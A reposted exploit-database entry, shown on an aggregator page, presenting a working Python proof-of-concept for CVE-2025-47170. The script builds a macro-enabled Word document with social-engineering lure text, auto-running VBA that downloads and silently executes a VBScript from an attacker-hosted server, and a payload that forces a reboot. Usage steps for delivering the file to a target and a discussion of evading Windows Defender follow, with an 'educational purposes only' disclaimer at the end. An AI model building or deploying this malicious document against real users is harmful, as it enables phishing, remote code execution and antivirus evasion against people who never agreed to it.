惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

Jina AI
Jina AI
V
Vulnerabilities – Threatpost
Security Latest
Security Latest
AI
AI
奇客Solidot–传递最新科技情报
奇客Solidot–传递最新科技情报
量子位
H
Help Net Security
Attack and Defense Labs
Attack and Defense Labs
The GitHub Blog
The GitHub Blog
L
LINUX DO - 最新话题
A
Arctic Wolf
博客园_首页
S
Securelist
S
Secure Thoughts
Google DeepMind News
Google DeepMind News
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
T
Tailwind CSS Blog
Apple Machine Learning Research
Apple Machine Learning Research
酷 壳 – CoolShell
酷 壳 – CoolShell
Stack Overflow Blog
Stack Overflow Blog
N
Netflix TechBlog - Medium
Cyberwarzone
Cyberwarzone
小众软件
小众软件
T
Threatpost
Exploit-DB.com RSS Feed
Exploit-DB.com RSS Feed
Blog — PlanetScale
Blog — PlanetScale
N
News and Events Feed by Topic
NISL@THU
NISL@THU
Forbes - Security
Forbes - Security
博客园 - 聂微东
F
Fortinet All Blogs
Simon Willison's Weblog
Simon Willison's Weblog
H
Heimdal Security Blog
罗磊的独立博客
S
Security @ Cisco Blogs
B
Blog
T
Troy Hunt's Blog
Engineering at Meta
Engineering at Meta
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
The Hacker News
The Hacker News
The Last Watchdog
The Last Watchdog
Hacker News - Newest:
Hacker News - Newest: "LLM"
I
Intezer
T
Threat Research - Cisco Blogs
C
Cybersecurity and Infrastructure Security Agency CISA
The Cloudflare Blog
S
Schneier on Security
月光博客
月光博客
L
LINUX DO - 热门话题
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org

The Exploit Database - CXSecurity.com

XenForo XSS CVE Scanner — Passive Detection Tool for CVE-2026-35055, CVE-2026-35054, CVE-2026-35057 ePati Antikor NGFW 2.0.1301 Authentication Bypass Apache HTTP Server 2.4.66 mod_http2 Double-Free Denial of Service NiceGUI 3.6.1 Path Traversal - CXSecurity.com Green Hills INTEGRITY RTOS IPCOMShell TELNET Format String Vulnerability - Realistic Full Chain Attack on F-16 Avionics (Ground Maintenance Scenario) OpenClaw < 2026.3.28 Discord Text Approval Authorization Bypass Kanboard <= 1.2.50 Authenticated SQL Injection OpenClaw tools.exec.safeBins <= 2026.2.22 Remote Code Execution Google Chrome < 145.0.7632.75 - CSSFontFeatureValuesMap Use-After-Free Siklu EtherHaul Series EH-8010 Remote Command Execution aiohttp 3.9.1 Directory Traversal - CXSecurity.com deephas <= 1.0.7 - Prototype Pollution leading to Arbitrary Code Execution / DoS LangChain Core - Serialization Injection to Jinja2 SSTI/RCE AVideo Notify.ffmpeg.json.php Unauthenticated Remote Code Execution Birth Chart Compatibility WordPress Plugin 2.0 Full Path Disclosure dotCMS 25.07.02-1 Authenticated Blind SQL Injection Mbed TLS 3.6.4 Use-After-Free - CXSecurity.com MonstaFTP Unauthenticated File Upload - CXSecurity.com Flowise 3.0.4 Remote Code Execution Swagger UI 1.0.3 Cross-Site Scripting (XSS) Vvveb CMS 1.0.5 Remote Code Execution SugarCRM unauthenticated Remote Code Execution (RCE) Belkin F9K1009 F9K1010 2.00.04/2.00.09 Hard Coded Credentials Commvault CLI Argument Injection / Traversal / Remote Code Execution Sitecore XP Post-Authentication File Upload Ultimate Member WordPress Plugin 2.6.6 Privilege Escalation Ghost CMS 5.59.1 Arbitrary File Read DOS Baby POP3 Server 1.04 Tenda AC20 16.03.08.12 Command Injection Projectworlds Online Admission System 1.0 SQL Injection JetBrains TeamCity 2023.11.4 Authentication Bypass Cisco ISE 3.0 Remote Code Execution Pandora ITSM Authenticated Command Injection Shenzhen Aitemi M300 Wi-Fi Repeater Unauthenticated RCE Malicious XDG Desktop File - CXSecurity.com Langflow 1.2.x Remote Code Execution (RCE) Microsoft Excel LTSC 2024 Remote Code Execution Adobe ColdFusion 2023.6 Remote File Read Malicious Windows Registration Entries (.reg) File Microsoft PowerPoint 2019 Remote Code Execution (RCE) Discourse 3.2.x Anonymous Cache Poisoning Social Warfare WordPress Plugin 3.5.2 Remote Code Execution (RCE) PHP CGI Module 8.3.4 Remote Code Execution Grandstream GSD3710 1.0.11.13 Stack Overflow Parrot and DJI variants Drone OSes Kernel Panic Exploit
VBA Bypass Windows Defender Exploit PoC
2025-07-02 · via The Exploit Database - CXSecurity.com

VBA Bypass Windows Defender Exploit PoC

# CVE-2025-47170 Exploit PoC VBA Bypass Windows Defender - Overview This Python script is a proof-of-concept (PoC) exploit demonstrating the Microsoft Word Remote Code Execution vulnerability CVE-2025-47170. It automates the creation of a malicious Microsoft Word .docm file with embedded VBA macros that download and execute a VBScript payload from an HTTP server. The VBScript payload forcibly reboots the victim machine. Script Breakdown and Explanation 1. Imports and Dependencies ```python import os import sys import socket import http.server import socketserver import threading import pythoncom import win32com.client as win32 pythoncom and win32com.client (from pywin32) are used to automate Microsoft Word via COM. http.server and socketserver create an HTTP server to host the payload files. socket obtains the local IP address. Standard libraries like os, sys, and threading for file management, arguments, and concurrency. 2. Get Local IP Address ```python def get_local_ip(): s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) try: s.connect(("8.8.8.8", 80)) ip = s.getsockname()[0] except Exception: ip = "127.0.0.1" finally: s.close() return IP ``` Creates a UDP socket to get the machine’s local IP address by "connecting" to a public DNS IP (Google's 8.8.8.8). This IP is used to construct URLs to serve the payload. 3. Create VBScript Payload ```python def create_vbs_payload(folder): vbs_path = os.path.join(folder, "salaries.vbs") vbs_content = ''' Set objShell = CreateObject("WScript.Shell") objShell.Run "shutdown /r /t 5 /f", 0, False ''' with open(vbs_path, "w") as f: f.write(vbs_content.strip()) print(f"[*] Created VBS payload at: {vbs_path}") return "salaries.vbs" ``` Writes a VBScript file salaries.vbs to the specified folder. The script silently runs the Windows shutdown command to reboot the system after 5 seconds. This VBScript is the payload executed by the macro. 4. Create Malicious Word Document (salaries.docm) with Embedded Macro ```python def create_docm_with_macro(folder, payload_url): docm_path = os.path.join(folder, "salaries.docm") pythoncom.CoInitialize() word = win32.gencache.EnsureDispatch('Word.Application') word.Visible = False doc = word.Documents.Add() ``` Initializes COM and launches Word invisibly. Creates a new Word document. ```python doc.Content.Text = "Please enable macros to see the salary details." ``` Adds some harmless text to trick the user into enabling macros. ```python macro_code = f''' Sub AutoOpen() Call RunPayload End Sub Sub Document_Open() Call RunPayload End Sub Sub RunPayload() On Error Resume Next Dim fullUrl As String Dim payloadName As String Dim fullPath As String Dim shellCmd As String Dim RetVal As Long fullUrl = "http://" & "{payload_url}" & "/salaries.vbs" payloadName = "salaries.vbs" fullPath = Environ("TEMP") & "\\" & payloadName shellCmd = "powershell -Command ""Invoke-WebRequest -Uri '" & fullUrl & "' -OutFile '" & fullPath & "' -UseBasicParsing""" RetVal = Shell(shellCmd, vbHide) RetVal = Shell("wscript.exe " & fullPath, vbHide) End Sub ''' ``` VBA macro code that automatically executes on document open (AutoOpen, Document_Open). It: Builds the URL to download salaries.vbs. Downloads the VBScript payload via PowerShell Invoke-WebRequest to the TEMP directory. Executes the VBScript silently with wscript.exe. Includes On Error Resume Next to avoid stopping on errors. ```python vb_proj = doc.VBProject vb_module = vb_proj.VBComponents.Add(1) # 1 = vbext_ct_StdModule vb_module.CodeModule.AddFromString(macro_code.strip()) ``` Injects the VBA macro into the Word document's VBA project. ```python wdFormatXMLDocumentMacroEnabled = 13 try: doc.SaveAs(docm_path, FileFormat=wdFormatXMLDocumentMacroEnabled) print(f"[*] Created malicious DOCM file: {docm_path}") except Exception as e: print(f"[!] Failed to save DOCM file: {e}") finally: doc.Close(False) word.Quit() pythoncom.CoUninitialize() ``` Saves the document as a .docm file (macro-enabled). Properly closes Word and cleans up COM initialization. 5. Start HTTP Server to Host Payload and Document ```python def start_http_server(folder, port): os.chdir(folder) handler = http.server.SimpleHTTPRequestHandler httpd = socketserver.TCPServer(("", port), handler) local_ip = get_local_ip() print(f"[*] Serving HTTP at port {port} from folder: {folder}") print(f"[*] Payload URL: http://{local_ip}:{port}/salaries.vbs") print(f"[*] DOCM URL: http://{local_ip}:{port}/salaries.docm") print("[*] Press Ctrl+C to stop the HTTP server and exit.") try: httpd.serve_forever() except KeyboardInterrupt: print("\n[*] Stopping HTTP server...") httpd.server_close() ``` Changes directory to serve the current folder. Starts a simple HTTP server on the specified port. Outputs URLs for payload and document access. Runs until interrupted. 6. Main Function: Workflow Control ```python def main(): if len(sys.argv) != 2: print(f"Usage: {sys.argv[0]} <port>") sys.exit(1) port = int(sys.argv[1]) folder = os.getcwd() # Create payload.vbs if missing vbs_path = os.path.join(folder, "salaries.vbs") if not os.path.isfile(vbs_path): create_vbs_payload(folder) else: print(f"[+] Using existing payload: {vbs_path}") local_ip = get_local_ip() payload_url = f"{local_ip}:{port}" create_docm_with_macro(folder, payload_url) start_http_server(folder, port) ``` Validates command-line argument (port). Uses current directory as working folder. Creates VBScript payload if it doesn't exist. Generates malicious Word document with macro pointing to local HTTP server. Starts HTTP server to serve files. How to Use Run the script with a port number argument: ```bash python CVE-2025-47170.py 8000 ``` The script will generate salaries.vbs and salaries.docm in the current directory. It will start a HTTP server on port 8000 serving these files. Deliver salaries.docm to the target user. When they open the document and enable macros: The macro downloads salaries.vbs from http://<your-ip>:8000/salaries.vbs. Runs the VBScript, which forces a system reboot. Windows Defender Bypass Discussion The VBScript payload is not embedded inside the Word document but downloaded dynamically. The macro uses PowerShell’s Invoke-WebRequest to fetch the payload instead of suspicious commands like bitsadmin. The macro uses basic VBA shell commands hidden from user interaction (vbHide). This chaining of small steps makes it harder for signature-based antivirus to detect a full attack at once. Note: This is a simple demonstration and modern Windows Defender versions with cloud heuristics or behavior detection may still block this. Warnings and Legal Notice For educational purposes only and authorized security testing. Executing the VBScript payload will reboot your system without warning. Ensure you have permission before testing on any machine. Use in controlled environments only. # nu11secur1ty [Demo](https://www.youtube.com/watch?v=CliD216hNuY) [Download the PoC:](https://minhaskamal.github.io/DownGit/#/home?url=https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2025-47170)



 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}